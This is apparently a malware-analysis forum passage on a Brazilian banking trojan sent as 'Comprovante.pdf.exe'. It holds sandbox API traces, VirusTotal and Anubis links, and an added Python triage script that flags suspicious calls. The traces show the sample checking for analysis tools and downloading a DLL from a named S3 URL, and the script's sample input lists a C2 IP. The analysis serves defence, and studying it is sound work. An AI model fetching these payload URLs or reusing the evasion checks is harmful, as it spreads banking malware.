FreeLibrary(C:\WINDOWS\system32\SHLWAPI.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\Normaliz.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\iertutil.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\WINMM.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\MSCTF.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\PSAPI.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\MSACM32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(ntdll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\3082\dwintl.dll) [c:\windows\system32\dwwin.exe]
InternetGetConnectedState() [c:\windows\system32\dwwin.exe]
GetUserName() [c:\windows\system32\dwwin.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\windows\system32\dwwin.exe]
GetComputerName() [c:\windows\system32\dwwin.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetStartupMutex) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2_32) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2_32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2help.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(shlwapi.dll) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\windows\system32\dwwin.exe]
LoadLibrary(rasapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(rasman.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(netapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(tapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(rtutils.dll) [c:\windows\system32\dwwin.exe]
CreateMutex(RasPbFile) [c:\windows\system32\dwwin.exe]
OpenMutex(RasPbFile) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\windows\system32\dwwin.exe]
RasEnumEntries() [c:\windows\system32\dwwin.exe]
OpenSCManager((null),(null)) [c:\windows\system32\dwwin.exe]
OpenService(RASMAN) [c:\windows\system32\dwwin.exe]
LoadLibrary(msapsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msvcrt40.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(schannel.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(crypt32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msasn1.dll) [c:\windows\system32\dwwin.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(digest.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msnsspc.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(cryptdll.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\system32\dwwin.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\windows\system32\dwwin.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\windows\system32\dwwin.exe]
OpenService(Sens) [c:\windows\system32\dwwin.exe]
LoadLibrary(sensapi.dll) [c:\windows\system32\dwwin.exe]
OpenProcess(ctfmon.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(SbieCtrl.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(explorer.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(u1210.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(wireshark.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(sniff_hit.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(iexplore.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(firefox.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(VBoxTray.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(procexp.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(BSA.EXE) [c:\windows\system32\dwwin.exe]
OpenProcess(XueTr.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(dumpcap.exe) [c:\windows\system32\dwwin.exe]
GetSystemDefaultLangID() [c:\windows\system32\dwwin.exe]
SetWindowPos(20994,TOPMOST) [c:\windows\system32\dwwin.exe]
GetForegroundWindow() [c:\windows\system32\dwwin.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\system32\dwwin.exe]
OpenProcess(csrss.exe) [c:\windows\system32\dwwin.exe]
CreateMutex(MSCTF.Shared.MUTEX.EBH) [c:\windows\system32\dwwin.exe]
GetModuleHandle(ole32.dll) [c:\windows\system32\dwwin.exe]
DeleteFile(C:\DOCUME~1\r32\CONFIG~1\Temp\597A56.dmp) [c:\windows\system32\dwwin.exe]
DeleteFile(C:\DOCUME~1\r32\CONFIG~1\Temp\74b4_appcompat.txt) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\3082\dwintl.dll) [c:\windows\system32\dwwin.exe]
ExitProcess(0) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\windows\system32\dwwin.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\drwtsn32.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(drwtsn32.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
WriteProcessMemory(c:\windows\system32\drwtsn32.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\drwtsn32.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
Executing: c:\windows\system32\drwtsn32.exe
LoadLibrary(msvcrt.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(advapi32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(kernel32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(gdi32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(user32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(dbgeng.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(dbghelp.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(version.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shimeng.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\apppatch\acgenral.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(kernel32.dll) [c:\windows\system32\drwtsn32.exe]
VirtualQueryEx(c:\windows\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
CreateMutex(SHIMLIB_LOG_MUTEX) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(winmm.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(ole32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(oleaut32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(msacm32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shell32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shlwapi.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(userenv.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(uxtheme.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(lz32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(lz32.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(DINPUTWINMM) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(Kernel32) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(comctl32.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(EXPLORER.EXE) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\system32\drwtsn32.exe]
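An added triage script for traces like the one above (my own example for this thread, not part of the original post and not code from Buster Sandbox Analyzer). It parses the `API(args) [process]` lines, tags the calls worth a second look (debugger and Sandboxie checks, RWX allocations, non-system mutexes such as INSONIA, a .cfg written under %WINDIR%, outbound connects, file deletion, very long sleeps) and only reports a process when several different indicator kinds coincide, because a lone IsDebuggerPresent() or a private mutex also shows up in HxD and dwwin.exe in this very trace. The sample input is a constructed excerpt copied from the trace above; the tag names, the mutex prefix list and the three-indicator threshold are my own assumptions. One caveat: the VirtualAllocEx/WriteProcessMemory pairs from hxd.exe into dwwin.exe and drwtsn32.exe appear when a plain hex editor spawns a child, so they are almost certainly the sandbox injecting into new processes; cross-process writes are deliberately not scored here.

```python
import re
from collections import defaultdict

# Constructed excerpt in the exact line shape of the Buster Sandbox Analyzer
# trace above ("API(args) [process]").  Values are copied from that trace;
# this is demonstration input, not a new capture.
SAMPLE_TRACE = r"""
Executing: c:\windows\winsa64.exe
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
"""

LINE_RE = re.compile(r"^(\w+)\((.*)\)\s*\[(.*)\]\s*$")

# Mutex name prefixes that Windows components create in every GUI process
# (the CTF.* / MSCTF.* / Local\ / Global\ names in the trace).  Anything else
# is a candidate infection marker such as INSONIA.  Assumed list.
SYSTEM_MUTEX_PREFIXES = ("CTF.", "MSCTF.", "Local\\", "Global\\",
                         "SHIMLIB_", "RasPbFile", "MidiMapper_")

# Modules a sample may probe for to detect an analysis environment.
# SbieDll.dll is the DLL Sandboxie injects into every sandboxed process.
ANALYSIS_MODULES = {"sbiedll.dll"}

LONG_SLEEP_MS = 5 * 60 * 1000  # beyond a few minutes it is stalling, not UI pacing


def parse_line(line):
    """Split 'API(args) [process]' into (api, args, process); None for other lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    api, args, proc = m.groups()
    return api, args.strip(), proc.strip()


def classify(api, args):
    """Return an indicator tag for one call, or None if it is routine."""
    if api == "IsDebuggerPresent":
        return "anti-debug"
    if api == "GetModuleHandle" and args.lower() in ANALYSIS_MODULES:
        return "anti-sandbox"
    if api == "VirtualAllocEx" and "PAGE_EXECUTE_READWRITE" in args:
        return "rwx-memory"
    if api == "CreateMutex" and not args.startswith(SYSTEM_MUTEX_PREFIXES):
        return "custom-mutex"
    if api == "CreateFile" and args.lower().endswith(".cfg"):
        return "config-file"
    if api == "connect":
        return "network"
    if api == "DeleteFile":
        return "file-deletion"
    if api == "Sleep" and args.isdigit() and int(args) >= LONG_SLEEP_MS:
        return "long-sleep"
    return None


def triage(trace_text):
    """Map each process path to its (tag, call) hits, in trace order."""
    findings = defaultdict(list)
    for line in trace_text.strip().splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        api, args, proc = parsed
        tag = classify(api, args)
        if tag:
            findings[proc].append((tag, f"{api}({args})"))
    return dict(findings)


def suspicious_processes(findings, min_distinct_tags=3):
    """Processes showing at least min_distinct_tags different indicator kinds.

    One IsDebuggerPresent() or one private mutex is normal for ordinary
    software (HxD does both); several kinds together in one process are not.
    """
    return [proc for proc, hits in findings.items()
            if len({tag for tag, _ in hits}) >= min_distinct_tags]


if __name__ == "__main__":
    hits = triage(SAMPLE_TRACE)
    for proc in suspicious_processes(hits):
        print(proc)
        for tag, call in hits[proc]:
            print(f"  [{tag:13}] {call}")
```

Run it against a full BSA log by reading the file into `triage()`; raising `min_distinct_tags` trades recall for fewer false positives on legitimate GUI programs.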
882  Computer Security / Malware Analysis and Design / Banking trojan II (different configuration). on: 16 February 2013, 14:34 pm
From the same e-mail contact I received another sample; it behaves differently and downloads a sizeable batch of files.
This time I analysed the executable with "Buster Sandbox".

URL: ask by PM.

Online analysis:

Comprovante.pdf.exe:
VirusTotal: https://www.virustotal.com/file/a8dd1f76473cb69e7012964a5d723cb81014a13413df572735c7ae28b9e297cd/analysis/1360255230/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1a9a78b746cd486e4adb6aa28bdf02761&call=first

Downloaded files:

jjca.dll:
VirusTotal: https://www.virustotal.com/file/fa3651cfcd2aca6c7303ef8017986669465b724dc96ceaddcb249f66b487d420/analysis/1360254397/
Anubis: http://anubis.iseclab.org/?action=result&task_id=18c69386fee0475e4d56e22cb9bc33ac6

jsob.exe:
VirusTotal: https://www.virustotal.com/file/d4ae23bf307150d9fd664eaac06bcce9d2101d946089a506b25f3f84d8248a8e/analysis/1360254575/
Anubis:

jsobs.exe:
VirusTotal: https://www.virustotal.com/file/e914bda041273705403f2a968f557f67053b609daae77ca37c05f97d922a9261/analysis/1360254739/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1d19bec75e40ba5e461ef3b2548210e08

Projeto.exe:
VirusTotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360254942/
Anubis: http://anubis.iseclab.org/?action=result&task_id=161f701d97b086d7421afd1ae0c2ba446

winsa64.exe:
VirusTotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360255019/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1abaf0d0a6553c1e4bda858417f3f38f7&call=first

Compression and compiler:

Execution of Comprovante.pdf.exe:

Code:
Executing: c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(b01a0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(13020c) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1001c4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(Pm.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1401a8) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetSetOption() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetUserName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(secur32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetStartupMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetGetConnectedState() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
